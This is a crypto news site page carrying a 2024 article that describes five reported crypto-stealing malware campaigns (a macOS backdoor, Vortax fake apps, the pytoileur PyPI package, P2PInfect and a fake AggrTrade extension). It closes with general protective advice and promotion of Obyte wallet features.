• Latest
  • Trending
  • All
  • Trading & Investing
  • Strategies & Techniques
  • Risk Management & Portfolio Allocation
  • Technical Analysis Tools & Indicators
  • Fundamental Analysis & Research
  • Blockchain Technology
  • DeFi & NFTs
5 New Malware Techniques to Steal Your Crypto (2024)

5 New Malware Techniques to Steal Your Crypto (2024)

October 24, 2024
X spaces repeat with bluhale

X spaces repeat with bluhale

May 5, 2025
Build Meowverse in Telegram Play-to-Aarn Mini Game

Build Meowverse in Telegram Play-to-Aarn Mini Game

April 4, 2025
What is the future of generative AI?

What is the future of generative AI?

April 1, 2025
How traders stay in front of the curve

How traders stay in front of the curve

March 26, 2025
How to improve crypto investment strategies using AI analysis

How to improve crypto investment strategies using AI analysis

March 23, 2025
Large XRP whale movements are concerned in the midst of Sec Appeal

Large XRP whale movements are concerned in the midst of Sec Appeal

March 21, 2025
Krypto debate raises questions about Warren’s hostile attitude

Krypto debate raises questions about Warren’s hostile attitude

March 8, 2025
Expert Eyes Bitcoin at $ 750,000 as Fidelity Assigns 1-3%

Expert Eyes Bitcoin at $ 750,000 as Fidelity Assigns 1-3%

March 8, 2025
Bitcoin price forecast – Forbes Advisor Australia

Bitcoin price forecast – Forbes Advisor Australia

March 7, 2025
3 Unconnection Statistics Crypto Investors used to detect Bitcoin network activity

3 Unconnection Statistics Crypto Investors used to detect Bitcoin network activity

February 28, 2025
4 Crypto Price Analysis Patforms that can improve your trades

4 Crypto Price Analysis Patforms that can improve your trades

February 28, 2025
From pennies to wealth in the satirical world of tap-to-earn game: interview with bums

From pennies to wealth in the satirical world of tap-to-earn game: interview with bums

February 27, 2025
  • Home
  • Trading & Investing
    • Risk Management & Portfolio Allocation
    • Strategies & Techniques
    • Fundamental Analysis & Research
    • Technical Analysis Tools & Indicators
  • Crypto News & Analysis
    • Bitcoin
    • Market Overview & Trends
    • Altcoins
    • Technical Analysis & Charting
  • DeFi & NFTs
    • Decentralized Finance (DeFi)
    • Non-Fungible Tokens (NFTs)
    • Exchange Hacks & Security Breaches
    • Wallet Hacking & Phishing Attacks
  • Blockchain Technology
    • Supply Chain & Logistics Solutions
    • Enterprise Adoption & Applications
    • Healthcare & Medical Innovations
    • Energy & Sustainability Initiatives
Thursday, May 8, 2025
  • Login
UnCirculars
  • Home
    • Home – Layout 1
    • Home – Layout 2
    • Home – Layout 3
    • Home – Layout 4
    • Home – Layout 5
  • Crypto News & Analysis
    • All
    • Adoption & Use Cases
    • Altcoins
    • Bitcoin
    • Market Overview & Trends
    • On-Chain Data & Metrics
    • Security & Scams
    • Technical Analysis & Charting
    X spaces repeat with bluhale

    X spaces repeat with bluhale

    Build Meowverse in Telegram Play-to-Aarn Mini Game

    Build Meowverse in Telegram Play-to-Aarn Mini Game

    What is the future of generative AI?

    What is the future of generative AI?

    How traders stay in front of the curve

    How traders stay in front of the curve

    How to improve crypto investment strategies using AI analysis

    How to improve crypto investment strategies using AI analysis

    Large XRP whale movements are concerned in the midst of Sec Appeal

    Large XRP whale movements are concerned in the midst of Sec Appeal

    Krypto debate raises questions about Warren’s hostile attitude

    Krypto debate raises questions about Warren’s hostile attitude

    Expert Eyes Bitcoin at $ 750,000 as Fidelity Assigns 1-3%

    Expert Eyes Bitcoin at $ 750,000 as Fidelity Assigns 1-3%

    Bitcoin price forecast – Forbes Advisor Australia

    Bitcoin price forecast – Forbes Advisor Australia

    3 Unconnection Statistics Crypto Investors used to detect Bitcoin network activity

    3 Unconnection Statistics Crypto Investors used to detect Bitcoin network activity

    • Bitcoin
    • Altcoins
    • Market Overview & Trends
    • Technical Analysis & Charting
    • On-Chain Data & Metrics
    • Adoption & Use Cases
    • Security & Scams
    • Opinion & Predictions
  • Blockchain Technology
    • Enterprise Adoption & Applications
    • Supply Chain & Logistics Solutions
    • Healthcare & Medical Innovations
    • Energy & Sustainability Initiatives
    • Gaming & Metaverse Infrastructure
    • Web3 Development & Decentralization
    • DAO & Governance Protocols
    • Scalability & Interoperability Solutions
    • Privacy & Security Enhancements
  • Trading & Investing
    • Strategies & Techniques
    • Risk Management & Portfolio Allocation
    • Technical Analysis Tools & Indicators
    • Fundamental Analysis & Research
    • Market Psychology & Sentiment
    • Crypto Tax Implications
    • Institutional Investment Landscape
  • DeFi & NFTs
    • Decentralized Finance (DeFi)
    • Non-Fungible Tokens (NFTs)
  • Regulation & Policy
    • Global Regulatory Landscape
    • SEC, CFTC, and Government Actions
    • Tax Implications & Reporting
    • KYC/AML Compliance & Standards
    • Institutional Investment Guidelines
    • Central Bank Digital Currencies (CBDCs)
    • Stablecoin Regulation & Oversight
    • Self-Regulatory Organizations (SROs)
  • Security & Scams
    • Exchange Hacks & Security Breaches
    • Wallet Hacking & Phishing Attacks
    • Rug Pulls & Exit Scams
    • Malware & Ransomware Threats:
    • User Education & Best Practices
    • Regulatory Frameworks & Protections
    • Insurance & Recovery Options
  • Community & Culture
    • Crypto Influencers & Thought Leaders
    • Social Media & Online Communities
    • Memes & Internet Culture
    • Crypto Art & Music
    • Events & Conferences
    • Adoption in Developing Countries
  • Opinion & Education
    • Expert Commentaries & Predictions
    • Beginner Guides & Tutorials
    • Glossary of Crypto Terms
    • Research Papers & Whitepapers
    • Podcasts & Video Interviews
    • Book Reviews & Recommendations
No Result
View All Result
UnCirculars
No Result
View All Result
Home Crypto News & Analysis Security & Scams

5 New Malware Techniques to Steal Your Crypto (2024)

by Emily Green
October 24, 2024
in Security & Scams
0
5 New Malware Techniques to Steal Your Crypto (2024)
491
SHARES
1.4k
VIEWS
Share on FacebookShare on Twitter


Cybercriminals never stop innovating, and they are particularly attracted to cryptocurrencies. Maybe you’re on your merry way exploring the internet without knowing how many landmines you’re going to step on. It never hurts to be cautious and stay on top of the latest security trends when it comes to protecting your crypto funds.

To give you an idea of ​​how big this evil business is for malicious parties, according to Chainalysis, about $24.2 billion was received by illegal crypto addresses in 2023. Don’t be part of the next number! Let’s take a look at some new malware techniques to be aware of this year and how you can protect yourself against them.

A backdoor in MacOS

It’s not exactly a good idea to download apps from unofficial sites, and this is a good example of why. Earlier this year, cybersecurity firm Kaspersky Lab discovered a new threat targeting macOS users’ cryptocurrency wallets, which was hidden in pirated software available on torrent and pirate websites.

When users install these seemingly free programs, they unknowingly allow malware onto their computers. The initial step involves an application called “Activator”, which asks users to provide administrative access. This gives the malware the necessary permissions to install itself and disable the normal function of the pirated software, tricking users into thinking they need this Activator to run the software.

Activator application in the backdoor malware. Image by KasperskyActivator application in the backdoor malware. Image by Kaspersky

Once installed, the malware contacts a remote server to download further malicious instructions. These instructions help the malware create a backdoor, giving hackers continuous access to the infected computer. The main purpose of this malware is to steal cryptocurrency. It replaces legitimate wallet apps like Exodus and Bitcoin-Qt with infected versions.

These altered apps then capture sensitive information, such as recovery phrases and wallet passwords, and send it to the hackers – effectively draining your crypto funds. A suspicious “Activator” installer appeared right after you got a ‘free’ app? Do not give it access, and remove it immediately!

Vortax, Web3 Games and “Markopolo”

The Vortax campaign is a fraudulent malware operation targeting cryptocurrency users, discovered by Recorded Future’s researchers. The cybercriminals behind this scheme use fake but legitimate applications to infect both Windows and macOS devices with information-stealing malware. Posing as a virtual meeting software called Vortax, the app looks credible with a website indexed by search engines, a blog with AI-generated articles and social media accounts on platforms like X, Telegram and Discord. The threat actor engages potential victims in cryptocurrency-themed discussions, ordering them to download the Vortax app under the guise of joining a virtual meeting.

Once users follow the instructions provided, they are redirected to download links that install the Vortax software. However, instead of a functional application, the installation files deliver malware such as Rhadamanthys, Stealc or Atomic Stealer (AMOS). The Vortax application appears to be non-functional due to deliberate errors, while in the background the malware begins to steal sensitive information—including passwords and seed phrases. Further investigation revealed that the Vortax campaign was linked to several domains hosting similar malicious applications and fake web3 games, suggesting a well-organized effort by the threat actor identified as Markopolo.

Markopolo’s tactics include using social media and messaging platforms to spread their malware, which also masquerades as brands and games such as VDeck, Mindspeak, ArgonGame, DustFighter, and Astration. This strategy not only widens their reach, but also increases the likelihood that users will be tricked into downloading the malicious software. The campaign’s sophistication and adaptability imply that future attacks could become even more common, highlighting the need for users to exercise caution when downloading third-party software, especially if they appear to be pushing for it suspiciously.

Pytoileur, a trap for Python developers

Sonatype researchers have uncovered a new threat targeting cryptocurrency users through a malicious Python package called “pytoileur.” Disguised as a legitimate API management tool, pytoileur tricks users into downloading it from the Python Package Index (PyPI). Once installed, the package secretly retrieves and installs malicious software designed to steal cryptocurrencies by accessing sensitive information stored on the victim’s device.

The malicious package was cleverly hidden within seemingly innocent code. It downloaded a dangerous executable file that, once executed, performed various malicious activities. These include modifying system settings, maintaining a presence on the device to avoid detection, and, most importantly, attempting to steal cryptocurrency from wallets and accounts associated with popular services such as Binance, Coinbase, and Crypto. com. By accessing browser data and other financial details, the malware can harvest digital assets without the victim’s knowledge.

Pytoileur malicious package found by SonatypePytoileur malicious package found by Sonatype

The spread of pytoileur involved social engineering tactics, including exploiting community platforms such as Stack Overflow to entice developers to download the package under the guise of solving technical problems. This incident is part of a broader “Cool package” campaign, which marks an ongoing effort by cybercriminals to target cryptocurrency users through sophisticated and evolving methods. Mend.io, another security firm, has identified more than 100 malicious packages on PyPI libraries.

Developers can avoid malicious packages by downloading from trusted sources, verifying package integrity, and reviewing the code before use. Keeping up to date with security advice and using automated security tools also helps.

P2PInfect, a teeming threat

Identified by Cado Security, P2Pinfect is a sophisticated malware that uses a peer-to-peer botnet for control. In other words, the malware detects whether a computer belongs to a network and infects all the connected devices to communicate and control each other directly without relying on a central server. The updated form initially appeared dormant, but now includes ransomware and crypto-mining capabilities.

Upon infection, it spreads primarily through vulnerabilities in Redis, a popular database system, which allows the malware to execute arbitrary commands and spread itself across connected systems. The botnet function ensures rapid distribution of updates, and maintains an extensive network of compromised devices – for example, in an entire company.

Victims typically encounter P2Pinfect via insecure Redis configurations or through limited SSH (Secure Shell) attempts to manage remote systems with generic credentials. Once active on a victim’s system, P2Pinfect installs a crypto miner that targets the Monero cryptocurrency. This miner activates after a short delay and generates cryptocurrency using the system’s resources, secretly tipping earnings to the attacker’s wallet and slowing down the device’s capabilities.

Ransomware note in P2PInfect. Image by Cado SecurityRansomware note in P2PInfect. Image by Cado Security

The ransomware component encrypts (blocks) files and demands a crypto payment to get them back, although its effectiveness is limited due to the typical permissions of infected Redis servers. The attacker’s Monero wallet accumulated about 71 XMR, equivalent to about $12,400. This illustrates the financial success of the campaign despite the potentially limited impact of the ransomware due to the typical low-value data stored by Redis . To avoid this malware, remember to secure Redis configurations and regularly monitor for unusual activity.

Fake AggrTrade, and other malicious extensions

The fake AggrTrade Chrome extension, described by security firm SlowMist, was a malicious tool that tricked users into losing significant amounts of cryptocurrency. The extension posed as a legitimate trading tool (AggrTrade) but was only designed to steal funds. Users unknowingly installed it, which then exploited their access to cryptocurrency exchanges and trading platforms by hijacking sensitive information—passwords and credentials.

The extension functioned by capturing cookies and other session data, which allowed it to impersonate users’ logins and perform unauthorized transactions. This led to the theft of about $1 million in total. It was spread through deceptive tactics via social media and marketing promotion that lured victims into downloading and installing it, often from unofficial or suspicious sources.

Fake AggrTrade extension, before it was deleted. Image by SlowMist Fake AggrTrade extension, before it was deleted. Image by SlowMist

This particular threat has already been eliminated, but it is only a meager example among many efforts. Currently, several other malicious Chrome extensions masquerade as genuine trading services aimed at stealing crypto. To protect yourself, only install extensions from trusted sources, regularly check permissions, and monitor your accounts for unusual activity.

Also remember that all browser extensions are capable of tracking your entire browsing history, seeing what you do on every website, and stealing cookies and other private data. If you use hardware or paper wallets for significant amounts and keep security software updated, you can also improve your protection against such threats.

Protective measures

To protect against crypto-stealing malware like this, you can apply some basic measures:

Install from trusted sources: Only use extensions and software from trusted sources and official websites. Verify reviews and permissions before installation. Install as little software as possible: before installing another application or browser extension on your computer, think again if you really need it. Maybe you can achieve your goals with the existing software? (However, it is safer on mobile platforms where every app is in a sandbox). Regular security checks: Regularly review and remove unused extensions or software. Regularly check for unusual activity in your crypto accounts (online and offline) and system. Use strong authentication: Enable two-factor authentication (2FA) on your accounts to add an extra layer of security. In Obyte wallets, you can do this by creating a multi-device account from the main menu or setting a spending password in settings.

Use anti-malware tools: Use up-to-date antivirus and anti-malware tools to detect and block online and offline threats. Secure your crypto: Store significant crypto assets in hardware or paper wallets to reduce exposure to online threats. The Obyte wallet allows you to easily create your own paper wallet by generating a text coin (twelve random words), writing it down, and then deleting or blocking the software itself until you need to spend the funds.

InsideObyte and beyond, be sure to use secure and verified wallets and follow these best practices to protect your assets!

Featured vector image by Freepik

Disclaimer for Uncirculars, with a Touch of Personality:

While we love diving into the exciting world of crypto here at Uncirculars, remember that this post, and all our content, is purely for your information and exploration. Think of it as your crypto compass, pointing you in the right direction to do your own research and make informed decisions.

No legal, tax, investment, or financial advice should be inferred from these pixels. We’re not fortune tellers or stockbrokers, just passionate crypto enthusiasts sharing our knowledge.

And just like that rollercoaster ride in your favorite DeFi protocol, past performance isn’t a guarantee of future thrills. The value of crypto assets can be as unpredictable as a moon landing, so buckle up and do your due diligence before taking the plunge.

Ultimately, any crypto adventure you embark on is yours alone. We’re just happy to be your crypto companion, cheering you on from the sidelines (and maybe sharing some snacks along the way). So research, explore, and remember, with a little knowledge and a lot of curiosity, you can navigate the crypto cosmos like a pro!

UnCirculars – Cutting through the noise, delivering unbiased crypto news

Share196Tweet123
Emily Green

Emily Green

Protecting your crypto journey is Emily's mission. Her knowledge of cybersecurity threats and common scams empowers you with safe practices and secure storage solutions.

UnCirculars

Copyright © 2024 UnCirculars

Navigate Site

  • About Us
  • Advertise
  • Terms of Use
  • Disclaimer
  • Privacy Policy
  • Contact Us

Follow Us

Welcome Back!

Login to your account below

Forgotten Password?

Retrieve your password

Please enter your username or email address to reset your password.

Log In
No Result
View All Result
  • Home
  • Trading & Investing
    • Risk Management & Portfolio Allocation
    • Strategies & Techniques
    • Fundamental Analysis & Research
    • Technical Analysis Tools & Indicators
  • Crypto News & Analysis
    • Bitcoin
    • Market Overview & Trends
    • Altcoins
    • Technical Analysis & Charting
  • DeFi & NFTs
    • Decentralized Finance (DeFi)
    • Non-Fungible Tokens (NFTs)
    • Exchange Hacks & Security Breaches
    • Wallet Hacking & Phishing Attacks
  • Blockchain Technology
    • Supply Chain & Logistics Solutions
    • Enterprise Adoption & Applications
    • Healthcare & Medical Innovations
    • Energy & Sustainability Initiatives

Copyright © 2024 UnCirculars